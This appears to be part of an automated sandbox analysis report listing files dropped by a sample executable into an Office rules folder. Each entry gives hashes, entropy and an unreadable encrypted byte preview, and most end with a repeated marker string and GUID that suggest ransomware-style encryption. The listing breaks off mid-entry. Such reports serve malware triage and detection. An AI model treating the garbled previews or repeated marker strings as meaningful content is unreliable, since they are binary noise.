                                                                                                                                                  Preview:<?xml+O. .X.0..R..p{.R..?g.......W....T.....K...-...U...M1..l....C..2.E.(.....`K.W...4D.b..<-.|..@.kC...Q7.B5Q?...j...-T....;.G....&;..r.j|..^.p...........W..U.........J..>..>7...X.yXS.....u..T.K.....R.}.... 3..x.c.}(w..u..."...fNi.j....wu<:..&...?....(} .1=$...5.r...].V.f.p.BV 3..(5W....U|.s...7....a.......,v.>.x.Y..w..D...I.E..pU.I|:...../..d.,`..X|......bNzC.....5.~t.!.R.ca..fL.3.l....a.....}..n.?..'......8.*!...t...3.*.....iV...3~.p....~....V...e.Qk.D..Ig.@Y.......:.?~............>..r.O.*.s3.B....j%............... [.#.9...zx.v>R.u.|.\J.......B.j..j.......O5.0..!'\(..t>.u../9..6q%.y.-...30......q..p7.......W..1?.>..Hx?[;._..V...s.>...LJ.8.TG...6..X....XA/J..bO..ox.......ROD....F............*.l.R$.#'....F.t.\I.0=..J..Q......?.J..z..WX.NI<.../.{.N..s..m...._..;....w..AkT.{..n(.9.Yd....i...0{P..n;...i...6.Lv.?...%i.!....b.9M|.j.Kn0.A.z.~...*T[>...6...r*..{K..UT..U.....y 9.}...%~.f..G.;.yD.[...e......@....E..X.|?P..e..4'..d....H..K....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10907v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):937
                                                                                                                                                  Entropy (8bit):7.781748985198477
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:avLUAPiN3NV8JQYBQkCnUHbef9fiJuk8WTdW2bD:gUUiUJBASqfI7hfD
                                                                                                                                                  MD5:E557025A2DE2A26C7620B49317A20ED2
                                                                                                                                                  SHA1:2EE589C7B9F2E0D494B9C685F63D2987437C30B2
                                                                                                                                                  SHA-256:EE1469BD4F9615B29BD44AD7035F29D1FB1BFB1BC3F822DF641D3EB766A0EF3B
                                                                                                                                                  SHA-512:BA0AAD17CE3421E0CC68E4075B8E9ECABEBC9E995569E9B29130522D693B234530BEDAF560D73F585A2B60C228A07FC8F78B47466F6A9D311D9C10676AF6D7CA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...c.Kx...@....F........ ......n..WHDT.d6h..t..(s..F]+p..X.v......3.[.S.v...,.>B..].;.%<.....3..R.`A..;.......e....' ..Lb.]a@A.p...(<.........D.v`......%.F../.'7.....4.....;P.9.....j.v.....k.j.^I.).Qjf.2+.Z1...mQ.b......[U58.)hX..|...d.B.b.....A.j..`9..M*x....<..f.\.`......'&.^...P.V...N..h......<.(.rZ.sD....+E.@Ma.~qy.......;u.>...Sh........B.o..:}6....0.?.nm...o...9h...#.n...{.....t..|..VR..T,B...(..PH..u.&"#g..\..C...C..w.....6...(:.).;)t.....<).%/....$.A..1}Y...k......4...TBp6....W.<G..s...de.N...j.q.X....+....+....@VT...&......n.0:.]g..P0...S.V...tF-...qO...I.p.N.$]......h..v.c.B..8...jQ..$.\A../.4.t.u.?. .(...S.=..W\{...#..L..5l.O..=.>n....E.....c..B.d.^..]..Y....I.w>......\.;..8/..@[..h.~.r/..T.n 5L.2U4.1............5.8e...e e...]...c-.]>...@DN..@.h.....>6`%wj..;.!.VMvK.!6.K....AAM+...]umMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10924v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):891
                                                                                                                                                  Entropy (8bit):7.776609467598731
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:f5w55ofrEgJIQt7fee+slmmkurCcjXIZhqzn2bD:RwnKE9Qt7fexslmmkNmakQD
                                                                                                                                                  MD5:5401512FD455E56E2BE0D70D49A79D79
                                                                                                                                                  SHA1:9678A0DC7D9636C88909AC0234A88C74EF44C951
                                                                                                                                                  SHA-256:D6E2F721E0997EE3C72E96622F5048A7D76609085ADC4CC69C96E727BF1BA431
                                                                                                                                                  SHA-512:7458EF5AEEBFECCF58316CEC05E171AAC02F4C54260B50A0FAC18B15F918A07AA9C27A54A68B29B58A8097EEEF8322C6DA9CF25DB724F6AD5DB33924355905C1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..d.Q..K...-u...dY....C..4..a. .t.D.R.!G.=..c...F...n..cYd...=.l{w..K1.u.f.m{.*p.I..,pjt...W~W.D. M3.R.....o....4.;.k.S.z.=....G..m....Wy.K.T..G..@o....h...].Hk.?......c........\W^.k.iw....<..{.....C,...jw...L..sD.....C.j.."6P.Tg|..Ya.V...........Yf.:r30.!...._...G....hXT.63N.......6.v.../..sh...C...Q..].Z).j.gJm..[bKq.8...D9P..4.b.X........[...#.d...pUP{D.'dq.q.....,|d..Zi..#.L,.'...]..g..D....*......J.&.....~R|.....D3LF.j....E..a....'...dY..6..y.N.Ht..B...P....P...kx#%...b.o.1..F..<5L.H..$H..yj#6=....S...^..$.&H{C."...J..?.......M..t..._..q.&.....'..C=......h.R.B..P..$.}a/.%...Bg....eOY..ea|..oc...&..N...~>.GN.9.zXx.)5..#..*.oO.m..h$....y..Vi9..WAV....U.................Un^.A.....l.C...^.$......5...:........(...Z_5E....q^.z.@(/...8.?.8.,q-....$&.s....V.kT..X.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10925v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1049
                                                                                                                                                  Entropy (8bit):7.837137583842208
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:61J1zRnB4b5M75HgipK5VJhMt1eWpc/tmo2bD:6L3cqtAiYtZMbD
                                                                                                                                                  MD5:B9701FCC356B60402BBAAACD3BC1E011
                                                                                                                                                  SHA1:BC39E98AF60E3F4225A721CB52559724CD89F25F
                                                                                                                                                  SHA-256:63E4182D5E5590189BFE6982CE0CDE7B4044121A32A5954518CE67E3F61EB4B3
                                                                                                                                                  SHA-512:C8C1BABE6B8B993E9DDCA956D250F7BF0B57742432D5E84E464A6CB7D6989C180D5A904EDB72D2116105B819875F1D2C7FD3EA4983CD4C39A836043E3511C4F4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..-..n..(L{.Q.:W....YM...s~.....n.|..L?.E..AOPI ........l...-....6.rv?!Z.b.Y<Z. .(..k.O..0e._H.^...{E.=..../x..a...P|.{...;.n2...hS.Z..;."}.P..I.ro..r.I.7..#.|...u@A..WiB;.!..%..A<..-"efaf.;.9.d......`..uz_.`........=[.F.K.j.E..M...!..g^$..5eF..)>..G....>..XP?.8CF.R!2..n.4....1;....[....L.H.4...>..P..];.._.p.8.G..J*...).o....1.....&.;..b.......Gs.Y..v........U...k.7.c.....~;~.....\. "9...0'jA.C.HGmQ....."1.M...!t....}=....v._.yR..~.x.;..Y....yr.....p|)9..8...."..(xO...ux:.'........6..T.......G..?.r.M..........B.....F..,...".....?........r...!Wt..Q..k...i.2.....d....!....0F....&Tu.....z....U.7.4.~..vV%X..C..\....O.W.>Dm.....t...i.% .A.p...Nr..}i:.{;..Z@...V....K.P.S.i..D.W.d(. .2.8.._.9%...X...j3...X.39b..'....+XP..^.{...c...iq.@T...;.x..M.ZI..."...&...;...5^..1@.\~P"1.Y:o;..Q...._ .m..'....J.....UE.../Q.{..&...'...D............g.e.S..q.c...$!.;..dt@.]DC..Te...!z`&H3...:....f..W...*...@Uc...)....mMsRxMUuXypapZbGOAfxD9pczHmW8

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10940v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):885
                                                                                                                                                  Entropy (8bit):7.796481722428914
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AAryTxnk4362z1iFnN5gzVr3eVPyqq2bD:AFTxk436uimZqPy0D
                                                                                                                                                  MD5:9080EDFE4B0CD26BD3E13AFD73C1D566
                                                                                                                                                  SHA1:5A7686E9FEBF5C55CCC28906E5F6B3A21107D899
                                                                                                                                                  SHA-256:D3A6DF20D708AD6D17DEFD15463D98342F1023D964A34B750593C807FDF9CF7F
                                                                                                                                                  SHA-512:CE82C4A5869DB72B10148592C3180C623DF89310002F3B70CB6DFD2BA624D5C7FE6CDDA0AF31B7B76472131CAAA68E5FEE9D5AB8BA0BB68C7B11DEF546B8C9F6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..$*/b..|....;9.;.9..h......;..S.2...^&.#.-.....[...0u.-!..k.ORU.A{.h<.`)..q.P....*....g7{f...5..]b..j"bJ......u<.tr0..-...}u....._j..F..xK......,/.*.....q..C._......}.I.4..0.lJ........Q.>...&.4...V68.Y.K......\..".H..P......11.._.%....zhiZ...eT.X.N.....i......@..t.|....P....S..K[..]4..g...y.....d|.Z$QS(................,O..'......1........1\......:.9.B.o+..fY{]..2.3.......K.U.,..Bk..f}.O...H3nG7....-q....."a.....`K.....Q....sL..Q..x".o!.............L.M...7....6.Q..}.\.<9.7E....iw?.....vS.....5./..6..3w.6..7.... .o.=.o..5N..X.(.d.._..Mb/J..K<...6..j..U._.y......]....0.kl0@N...eqY....N.Ck3...qG!m..A.J.0C\q..d}...0.\.!....F.1.q....).`.......1..'A.]..W.E#@.<i.^k..K..$.X.l..R..H.T..i....,...,.5.h..GyMe+.....FQ.he@....H.x.....ju.v. ...A...u... "V.pv)H.M,......L7..O../.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10952v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8529
                                                                                                                                                  Entropy (8bit):7.982902549393037
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:rjDxf0krkIaudLfMUKfJHEIGN/WR05oRSmW8VRQ+xwxL:rjtf0PLudmpGN/BMSmdDxwJ
                                                                                                                                                  MD5:F84B7ED8BD3E8F1B6011FE74109E5BA1
                                                                                                                                                  SHA1:62074357DD37B032427B6BA69777D9B61530CBD2
                                                                                                                                                  SHA-256:7B0975F48D8F37DAEA8E95A32DC8BF66506521B3548392ED31D68928021EB5EB
                                                                                                                                                  SHA-512:DA48B92D5AF2A5173036ED3011CE12435D516F8A70F535E113C5E0A9488096C325AB94AD70ADFFB4C1B47D818F2DABF99BA9026AFF28106A29799B36F9C119FA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....v.7a3...._t.r[...&...c.oBQ...;......m{{......3D7.e.N...EsX.Gx*+vPL....a9.T.B.wUi...:.c..W.~.Z.s.''......{.D:.?!.;..f.YC....t...J....sy+xN./......)#..j.>5.[...n.a.......Ku......|.a.R......8.P....'H.<.l.e...#.........D.G...M>.....#/........TRkzL.34...bg..D..!..S.Px...)...&s...L)....2...'..Z.j....g....'.......rRwS.[.$BD.L..|........._...!.z...6|...j.j.B./q.O.......-4......m..g_...s.=..`.~.v......MS4...n....S...Ue`9.R.t.P._83.....g._./vY =.by....7i......tG:".>..}|.s...0..;....X..T..okS...._.k[i.gF.{..%8...P.*c.G.u.=p<.e...l........`.......z.J/f*....r x.b...k..7..5...0..$[.........y.......e...@$.M......#0....h&..G...n.&?^.Zw..D...{..V..7...o.ETB9\...1...r..o.i.J_.....o..~TxV...rZ.^&"...Ea............D^{.X."V:Y.Yo..4F...[G[.z.t...(.0.l.....d.....qX.l.cW..#.g.....Y.K..}.x...v....f.T.2Q)....R| .F.q...z;.=.i,G.....s.%5v..G.U.S{....4.H.|.E..ZlV.wf*o....P0x8....<*bG....m._.....{.d/O..*.A....p..$......=c,P.......j.A.K+..p...iF...u

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10955v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1242
                                                                                                                                                  Entropy (8bit):7.8277608196625845
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:L1pm9E7zLUmd+D5WyAY4tXKTu6bd7kr2qZeRf2r/QyhuU8pwlv2bD:Lum7zYocWysl6JorGR+zQyhApwMD
                                                                                                                                                  MD5:FEBDC1A83F462BB50951FC42E50F73B2
                                                                                                                                                  SHA1:6AE8D9CA59BF0929A97D96667AC57DD36418972A
                                                                                                                                                  SHA-256:70F11A7C85903D86E4F18011E13C1C9DCBC65B8455750EE2D8B86F91968241B1
                                                                                                                                                  SHA-512:3C503437515C1EBA15ACE7F725DA5AB77FE3AB482F8DB9722F5BF1C2D61C1710B4595C2D7E264551B065396E59CC50B2C68DC2BC9B65542DBF89A1B3486DF716
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...S.}i...]........rg{..F.b.s..Ic ..CX.\9.v..Ii....@F...../.3....'....?/.Jm./9..J._.....6e1......+..6...-\..7.#O..d9e.."._..Z7.......1. ..u..........'?..EF......D}w...}.c_.yz....R.4..4J(Zr.g.:..Z.7 .7oS.-.r.E\.q].m.y.G..{rX.!.....[.%. w....0......x...+l...*...Q.|Z.....eK..^..Y\.<.............<6x..............f3H_.S(..,.....1- .O.=.Wx.-7r..K...k...P...d..g*....+....;>.....n..y.7,...2& c...A.4......g.......XI!.U.*.h......N ..w^./..F@.+.H..z.D..'.p....o.ZD...U..'..-..vP...v..ma,......fgD....$B.....:...(..d.x=..F..kr8.g...I.R..K..r...=...u....I._G...t..{...mL..V.{Y..ep.J.#M.....kw:._..Vo..8....)..s.....E....9.R.jk...>-d...J.Q...v..S....o`...}.ztqN.T.d..x.mf.6,{r.<.../<...V..h......q.cJ....X.....f0./.|..F.........k..aq....t....K....{hj......|...D.DGC5.&..&...N....o"^Q<.c.T..g..........-R.....s}E...h}g......+..._..k.4.9.kqB...I.zC/.?E...U.......a.......%.i.....@......V.+.J..|.. .PT...D.P..i.+h.......Z.L.]Y....K..U%o..<...HQ....+2...m..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11150v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1185
                                                                                                                                                  Entropy (8bit):7.820215374585492
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:UP3YGTwVoFgGznZbliKtge3o+jPc9uOuf5dn1X5QRgxI17uP2bD:K3wqFgG71v9YYceDnV5egevD
                                                                                                                                                  MD5:A9F2443502B96A78A21B5ADA2BBB9288
                                                                                                                                                  SHA1:9EDE93A1B607F6D8F23251D8928838ED8E9D744F
                                                                                                                                                  SHA-256:4A44D31D6D48B32683FF130E3A9AF278B58AF3BB3ECFACB7A3BC47E8939C395B
                                                                                                                                                  SHA-512:B7CA9F295B362F7EFAB8C9203C9F4418FD6A83705CBEB9232D10428EDC941E071D69BF6287899B056FB73E041B675BD232BFE59098D77BAE2C97035C66558C8F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml4...S(........%..iN..NLv...U....P...?.).g...Q.....`7.&......0..A.o+N_"fL....0...i...)..n.(.4Sy.G5g..........JQ+....}N....<.....]..@...$$...WI..#..Z.&7....u...C..eSg.-...,...H"...xb..?>]..UTF=.q..8..A.I..._JDk.}.R..-.J....P@...H.. .`ae:.w.*.....BW.E.N..7D.L..V.tg.Sm.'.%....Y$..^.d1kR.j....O....>7F..b.@..P...2....6..i...|]2}.....74f..9.P..@...P...o.i.....C..#x.uR..v....+.4-w.<..$r...V..dX/.s).<Oi.t..||..],E....1~..IlF.&]...7..?f.l.....l....z....}.b..5.R..\..a.l>..&I....f..k..G.D{....m..F..k.vY.......T..a...t...6D^.1m$3....@...._.p.FS...c.q9Q?.ys..@!.$..........DP...i......x....5a..]...q.Ugq...%.jQ....)B.....r.x..9"....(...m1n.8...1.+{.-X.S........h.Y...z!....Q9.$..IX.P..@..i..X.y.4........ .....L........x..t ..(....5]..... ../p....h..P.s.d.....d..b..5..N......?.i..........ty....S.OE.T.|....v.I..y._..E...1Y.F.]...*....b...P..F...N.7...C\2.....U........P.+......0z..y4.Q:.D..!....\...d.E..._{.-m.b.+k*.Z..6.'}&..7...:D..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11154v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1073
                                                                                                                                                  Entropy (8bit):7.8112206465208525
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:woBYHDzssYupT0uPmtrRW1DNOOkbmmr2kPO/wlGf5/WDxUsp2bD:woQLnmNR+DHFIlGf5+WD
                                                                                                                                                  MD5:FE5C0DF88D893022E2A67944CBE310AA
                                                                                                                                                  SHA1:6BF5104EAA06814DC54C92F4F591D0161C139F27
                                                                                                                                                  SHA-256:837DCB68222A9DF5338154B68139AC502F44AE168E071D0EB0DCFF6495122DF9
                                                                                                                                                  SHA-512:5AFFED910F2EACACDCD9664EBE5DD232793F75B445271C910535117376EDBDD0FBF1E5613E88046831018C4D5E1B08B71CB1A3675A619E6FAB4BEE0E8C26B82E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlMT..'@C......,..M._..F"..7..11..N..l7.}.S..9.b.[U....b..'#.8kl.jh..V>..E...G:.(.+..%...S.9s1?,y.. L7...1...l...T...J.....}.)..2q........*.E.&*[F..P....O..#.;........../.t..jal.J.~......M.C...:..5.b{6.....g...S..%.]_.X8.A.....z...}....)..j...#k.?c@<......o.%c.o..f..g..'..r\i^.....F.BqW..A.u..OK/.M@.:B3.=tl.D...>..........[!.[........_3S.9.]<v.........B.G..J...._?vN.ZU....=u.aF.......s.......2...6...!...H.p.\W..}.j.A..L.....G.T*|..y..A.T...j.......xx.v..+.?.K...."2....5%.q...NFx....+..9.b.f{.H....f...."...C.*........|>kK....+.K8..Z.Z..oYIU6.;.....a.....Xq..$O..(...C.&........[.]....H.^....@..t..7.....d..H3....ANn..Qd..#.!;..d..n...}m.R...\p...T3I{....n37..N......!...A...........#U[...=....xJ8-\k..,Pr<j........FH...4..{./.l&L..y.~Y...8.v..V....9o."b.D...i9.....6X.Mz7O...f.u..=.'}S.^.._I...j./...6[....I.J.k.......j..*....[.Y.M..j..&.8..H0R................IPlG....o.^....%...:&41...Xmp_?K./......)km.....M7.>..z.w..6..mMsRx

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11187v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3232
                                                                                                                                                  Entropy (8bit):7.938097153029298
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:mwu6q9GbXuIM4d6SVLGpPAMUcdRPO/x3Q3du:tqAb+H4d7stAwdlO//
                                                                                                                                                  MD5:33FF68EB360C4577060D82A551C06FFF
                                                                                                                                                  SHA1:60F632EA515DA9167324F23046A22EBE36B63C9B
                                                                                                                                                  SHA-256:0B51CD6D921CA4EA71089E822F4F7F8B58CBFBB41FA3FC6051123B6D70C7DF05
                                                                                                                                                  SHA-512:679B517472C5A50D66483FCAA218C36123B45C4369C58FB82CCD06A6B7F74FA8D5F447A61CAF96363F5628D43AE8FAA97CC980EC1ED3D8CD409BFF3CD92AA7BE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmln...f..........~u..T.F...<.HL<.k...o....X.* .........../N&.....F.A....V.}..%V....K".[\X3....?V.pH.7....9>5.....k!....d.iM.:....k(......S..Y.b.(...........>Pry.l7{..6fa.......&7./-..[.h..P.Z.X..y..t.B...&.1i.c..s..j.%e.=...}........P:t.$.[L..O..w.|..$...{...d..Bs......pB..R<I. .r.MK.R.>(........'./6...F./|*d...-|..!..H.HQ....^....D.V..9......n.B.....F..H>0..C.....j5.8~..I.N..4.y..Y..<.D!...o.K.AZ."......$/$..KN.'.m..!.z.L.d.dP..P..]>.[g.......4.7|{.Jy=5.LZIn..:.E....\w..b.%&..R....>Za.w.w|./=qo.\9....5....,._......*..P|....4.$..5gU..&.g....A$c>.=.Q..{V.cw....?..e......).]...,k6.o.L..&C........xTW+".....O%./.`...E0.FKVmfI..*...a..xT.i.A'.....*..h.%....*.5........V.<...-.f..\g..0~.7!.;.f....d.....=d...x.....8r...`.K..)..7.q.'......g.,e...^..#Oj.....C.s&....%..!.,..a ........(\.c.4.s/y....B.kQ....bB...h.Co.&.t.\S.9F...h..:.+.A..:..8U.D.N.oP@G.E.d_..1.. >?L..;7..`c.*.s.w.b.,IF..2.5.g[yN.%.8..= ...()~!F(.-.7.(.s..."............~[.EO^..U..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11190v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1231
                                                                                                                                                  Entropy (8bit):7.840798065836799
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QYcJChE2AlNXBfRV8yq7OawtZYBXD+dxL4lRCM342bD:QYcJ1NXBfTL+O7mtWxeD
                                                                                                                                                  MD5:05E95783865DB4EF9EE7CA32C9DF59C5
                                                                                                                                                  SHA1:806DDD37F3ADE3E05A0C0F0B65EAD5E8789B5753
                                                                                                                                                  SHA-256:661D2AF38C36AE07231565B215544B8467BE4CD45F8FFB5978646E87C3D0FCB3
                                                                                                                                                  SHA-512:9963D2F4DDCA9BD826E21B02324F241E2157C09F8DD103AFE238594ED48FA00E6DA417A03621165AAAEFD47E2EA724B1C85F837C3A336BE9FD9874D9247A2EC9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.f.....l...N+...pm........5..lZ.........i.=al.....yH..j.!.m..&.....I.K....e.o7..*$..g..q$....@...N.....]...o..Y..=.GKi.c....5...~...j....a3..`9...~......5.W.m.....93.T.8DK1.@sm."q>...d,..W.vW.6.b.v{.l..1.......4'....qUD..e4a...'..|3....".m}M.HFv.1.e............H.zOs+#.a...@i7....b./.....xg.B.....{.DL...#.y.4-..m.>M9<.`~....T/T.F..."i:...l.c.D....0....yd...3 G.....r.|..(C..".H..d.*....-....;..9H ...L'<$.\...)..6...p...&..V.O.b.V.t.eU..>.%...TK...M.vEqe.pM!...M..~.6....>.8.0....0.;.3..].n.*Y{.......%...g.p..y1../...4..(..~$$.|..g........ab....|$.8Fd.T21=.uA..i........|..\.B(..Dwc.....y~.=..FL!w.%T!.)..y".....C......a.2c!..hH.k.o^.....>.Yx.!b.Uc..y..S_.w6=(...j..n......Xw.A0....s.?.._..e.Z..3@..`km.>..{w}..r...S....]..r..(.VGT.,1o.<...`*..l..8........R.V9.;...8a..]....w..w....c......++.=.....u.....=.G.d.X.........T.VH...+...-....0[......('`.{..".?..LG.ZmPR&{?....x}......Z..,BU.J1.x.=%....3N.tL..wk"..=qy....".+vq.9.0.Z=..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11195v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7567
                                                                                                                                                  Entropy (8bit):7.9731973238962786
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:4YbCGltLmpRZ9QFliqlNijnGKTKNGOYy8cl1KiVu:y4mhfsNQGnkOt8clLVu
                                                                                                                                                  MD5:E97D56AD3ACF89DB1A6EEEBB4616E525
                                                                                                                                                  SHA1:3DAFF6DC8F2A6555B14D695638C4E31FC0C45B17
                                                                                                                                                  SHA-256:EE6C1EA5BED261A35D7167A7943C38A988DA10F135A992F18395241D0013E208
                                                                                                                                                  SHA-512:D8EF73B5D693A88864FE4627BDF0C76D42E896B51B14161A7972E95B1C9BB701A86942B75D429A8449E47C7BF762CE62C04A4726E1B5C4B5A3C15942914B3D27
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml<aPHq. ..OR..c*0...m${T.,fd..W.Ap.1]....?.....d..^..-..iQ.k_.)$...t..)........U!..H...42m.....H.x..v.+\4....'ls....H...o..D..>....&....b..'.'.'.R...s?.e...[...@GM%..TU.8j..Yq4.y.w..Mm......o!n..%2!....Kp....m&a'M%.k.TC.L.T=.j...6>'.uq...=....?.D<oV...=......%.$L...h.c.kk=....j.i...>Aq.P.P.2..t.I._...xf...S..<.....,....7.a..F)..*..7.1...._.{....c.......@4l..V..F.H...{b.-.k....7x......#v.V..M...~.4.+..g$.q4.(]..u....$5d...|.M............oO.|.2.G...,\....6......|.!.<L..L...c..o.fA,L.4....Zy...Bt.....N..5E......=..9_e"....a......P.x$].}.<.g~WI.\.$...!..:A|.L..y...R........b..S.E...D...\.E.....i3R..v.l....^mU......'0.B...V..../x..$.EqN.B..il..z.yQ....Q...*....z...<....[.,..D..:\.^\#.q........~.............z.B.......3...d\5..X.1.86.}.nk.OU...z7.:........)*6!$....'l.}0.p.~K....mP%..Wl.<f.U.9.Z(.R...2:3L.L..$#.d`...p7..C..*l....HG.4.+.C..Y.Zo5.w&0-.Z...C zV..?.5n.z^.U&.o..y?'w.l.:N?....o.Q....(..a.:A..y..L....&.R.2.!d?...EXH....s..q.V.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11208v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):816
                                                                                                                                                  Entropy (8bit):7.744039859770347
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:4jaaQNgpu+xApxdMTT2UZwq7cgfjAtlkImGVPafldZNCUrBSjItv3kZ9SUdNciik:4jGgjOxdazcvTdV8rC+YjItvUZw2bD
                                                                                                                                                  MD5:AA5B3986AF1E22C1AFF7C220372CA9AC
                                                                                                                                                  SHA1:A1BB359E7CA3D3AFCF733CC035750A28A46A4870
                                                                                                                                                  SHA-256:CD822BCA13FDC128A5E55989DFC10746A299C8F5041D98EA5B8D90F13B5514B9
                                                                                                                                                  SHA-512:CB8353294B11C13AECEDE1E8F50C2DCBCF34E01722DC74FE4D682BF9C45F6BF88A4B0652DB189C4869A4EA20ADF8B191A0902AD328C7138310A98B9C4EF71753
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlE...Mm....mpf........jU.)M..ISN.J5..wY.A..N.........f...sx......../..?..K..,G.N..W....y\..):=....^.6"..@..../..S...S7K.. ....>...0.m@t&.}....4BfOU`f:0u].....F...?.+...6.<5......./1..X...\w.(...........)..X.|.u=p.4#@.=}..%7..f..o.\f..KE.D..u.{.....1.L..^...qH@._.},...~~.:..w{T...3.."%../.%;.c.>15..I..b.0.].(....LE[..Y..C......%...W.F.+.E..'.._.......c..S...z6...G1+...+.00...S.l..g.>..[.?#h.e......iP.a.~.].........u....1.)o.SM.J.V.~.B...'.p...._...Y).... ...8.w.gmN.W...........'...g*."En.....o].E.l..D.>.Z.cNY.x9l4.r.yp'...*..W"....l...=.A.......?.E^.C.!.x0.2?..Rd .-u:am@.......Li.O.=..... U.H.t.S.|'.R=..%.x....v#..xr;.9.."Z..Q...=3o..Y.nN.G..........$\....j......T5F.0_YLX...%.I.E..-.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11209v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2272
                                                                                                                                                  Entropy (8bit):7.9200924557318215
                                                                                                                                                  Encrypted:false
